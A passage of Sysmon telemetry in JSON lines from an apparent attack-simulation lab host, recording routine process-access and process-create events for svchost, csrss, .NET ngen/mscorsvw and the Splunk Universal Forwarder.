C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00108BC70D00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.038\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-00101DCB0D00}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.038","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-00101DCB0D00}","TargetProcessId":"4716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.038\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-00101DCB0D00}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.038","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-00101DCB0D00}","TargetProcessId":"4716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.038\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2258-5F25-0000-00101DCB0D00}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.038","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2258-5F25-0000-00101DCB0D00}","TargetProcessId":"4716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nProcessGuid: {41C8662E-2258-5F25-0000-001064CF0D00}\r\nProcessId: 2920\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","ProcessGuid":"{41C8662E-2258-5F25-0000-001064CF0D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010A59C0B00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010A59C0B00}","TargetProcessId":"2920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010A59C0B00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010A59C0B00}","TargetProcessId":"2920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:44.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:44.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
